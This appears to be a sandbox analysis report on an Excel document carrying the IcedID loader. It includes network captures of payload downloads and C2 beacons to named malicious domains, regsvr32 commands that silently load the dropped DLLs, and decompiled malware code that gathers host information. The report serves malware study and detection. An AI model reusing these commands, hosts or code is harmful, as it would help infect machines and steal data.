                                                                                                                                                                                                                              Data Ascii: k$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@H
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.843878984 CEST7INData Raw: 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06
                                                                                                                                                                                                                              Data Ascii: $H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$l
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845310926 CEST9INData Raw: b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48
                                                                                                                                                                                                                              Data Ascii: $$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845335007 CEST10INData Raw: 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03
                                                                                                                                                                                                                              Data Ascii: Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845345974 CEST12INData Raw: 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00
                                                                                                                                                                                                                              Data Ascii: H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHL
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845357895 CEST13INData Raw: 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00
                                                                                                                                                                                                                              Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845370054 CEST14INData Raw: 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b
                                                                                                                                                                                                                              Data Ascii: HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845380068 CEST16INData Raw: 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff
                                                                                                                                                                                                                              Data Ascii: JDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.845390081 CEST17INData Raw: 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84
                                                                                                                                                                                                                              Data Ascii: L$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              2192.168.2.2249169104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Jul 6, 2021 17:43:25.021378994 CEST64OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                              Host: uppercilio.fun
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Jul 6, 2021 17:43:25.083971024 CEST64INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 15:43:25 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 6413
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6O6Tx%2Fa6JwBLjjv0b8yjDNBb7VF9LhJqq5N%2BwpKxzdeVR2rVNl8u4ZZquzMU2VV%2Bg5l7FER8JeLvV5u5CGjZyAInwDs8V7lyLYAZOZLuQpLu4BfKhgV%2FBKNeXj0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 66a9f2d599581f1d-FRA
                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                              Data Ascii: 14
                                                                                                                                                                                                                              Jul 6, 2021 17:43:25.083996058 CEST64INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              3192.168.2.2249171172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.886595011 CEST323OUTGET / HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Cookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333637373036:416C627573:42414433343246413734333930453842; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                              Host: astrocycle.download
                                                                                                                                                                                                                              Jul 6, 2021 17:43:28.496232986 CEST324INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 15:43:28 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vMdMK1HG5M0SJ%2FFEEBsIzCUz7xVitHncPf0wKxa%2FaVhf%2F%2Fr8iNE7uf73xwHwcU1zE%2FMreObfjJ3efAEhIRirQq9v14X%2B9fRcqhL0kb9Jdtp%2Bo6vgu5SI%2BcETYhyFRcPyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 66a9f2e779594a61-FRA
                                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                              Jul 6, 2021 17:43:28.496263981 CEST324INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.440140009 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 2640 Parent PID: 584

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:17:43:39
                                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                              Imagebase:0x13f460000
                                                                                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2824 Parent PID: 2640

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:17:43:41
                                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                              Imagebase:0xff7e0000
                                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2828 Parent PID: 2640

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:17:43:42
                                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                              Imagebase:0xff7e0000
                                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2428 Parent PID: 2640

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:17:43:45
                                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                              Imagebase:0xff7e0000
                                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2828 Parent PID: 2640 regsvr32.exeCOMMON

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 004D27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E004D27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E004D2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x4d70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E004D2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                                0x004d27bc
                                                                                                                                                                                                                                0x004d27bc
                                                                                                                                                                                                                                0x004d27bc
                                                                                                                                                                                                                                0x004d27bf
                                                                                                                                                                                                                                0x004d27c3
                                                                                                                                                                                                                                0x004d27c7
                                                                                                                                                                                                                                0x004d27cb
                                                                                                                                                                                                                                0x004d27d4
                                                                                                                                                                                                                                0x004d27d7
                                                                                                                                                                                                                                0x004d27e7
                                                                                                                                                                                                                                0x004d27ea
                                                                                                                                                                                                                                0x004d27fa
                                                                                                                                                                                                                                0x004d2800
                                                                                                                                                                                                                                0x004d2806
                                                                                                                                                                                                                                0x004d285f
                                                                                                                                                                                                                                0x004d285f
                                                                                                                                                                                                                                0x004d2876
                                                                                                                                                                                                                                0x004d287b
                                                                                                                                                                                                                                0x004d2893
                                                                                                                                                                                                                                0x004d2893
                                                                                                                                                                                                                                0x004d280f
                                                                                                                                                                                                                                0x004d2814
                                                                                                                                                                                                                                0x004d281f
                                                                                                                                                                                                                                0x004d282c
                                                                                                                                                                                                                                0x004d282c
                                                                                                                                                                                                                                0x004d282f
                                                                                                                                                                                                                                0x004d2835
                                                                                                                                                                                                                                0x004d283b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x004d2842
                                                                                                                                                                                                                                0x004d2845
                                                                                                                                                                                                                                0x004d2849
                                                                                                                                                                                                                                0x004d2894
                                                                                                                                                                                                                                0x004d2897
                                                                                                                                                                                                                                0x004d289e
                                                                                                                                                                                                                                0x004d28a9
                                                                                                                                                                                                                                0x004d28b5
                                                                                                                                                                                                                                0x004d28b7
                                                                                                                                                                                                                                0x004d28ba
                                                                                                                                                                                                                                0x004d28c1
                                                                                                                                                                                                                                0x004d28c8
                                                                                                                                                                                                                                0x004d28cd
                                                                                                                                                                                                                                0x004d28d0
                                                                                                                                                                                                                                0x004d28d0
                                                                                                                                                                                                                                0x004d28b5
                                                                                                                                                                                                                                0x004d28d7
                                                                                                                                                                                                                                0x004d28da
                                                                                                                                                                                                                                0x004d28df
                                                                                                                                                                                                                                0x004d28e8
                                                                                                                                                                                                                                0x004d28ed
                                                                                                                                                                                                                                0x004d28f6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x004d28fc
                                                                                                                                                                                                                                0x004d284b
                                                                                                                                                                                                                                0x004d2854
                                                                                                                                                                                                                                0x004d2859
                                                                                                                                                                                                                                0x004d2859

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,004D2CFE,?,?,00000003,004D24A4), ref: 004D280F
                                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,004D2CFE,?,?,00000003,004D24A4), ref: 004D2845
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                • Instruction ID: 640fd6e994e8b85b59bf5d23c13764b50939707544c12c454c9a095b7eda267b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A31BCB1601B8192EB16EB22E92479A77A0EB99F94F488127DF0D07754EF7CC54AC308
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,004D2CB1,?,?,00000003,004D24A4), ref: 004D16CB
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,00000000,004D2CB1,?,?,00000003,004D24A4), ref: 004D1709
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3114120137-0
                                                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                • Instruction ID: 50c64a38bf8b735e08e72e81272f015caf6e3c44c2b8df7739c4485be1159b55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 632151B5715B4093EF158F92A86436A62A1BB85BD1F588037DF4A47774EF3CC8468708
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                • Instruction ID: e4e1c387bbf544278926b0d97cc4a6c29175b3066dbfc2a2dbff07b23cb747f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5471AF72301B9297EB24CF66E8647AA37A1FB89B94F448127DF4A43B24DF38C555C704
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 004D233C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                • Instruction ID: 243bc6c03c7c6f8ec5e480a334a78569e8efa235cbcebb34653b0ac824297d4c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E3159B2701A418AEB128FB5E95439A33E4EB98B88F584137DF4D97B18EF38C549C354
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 58%
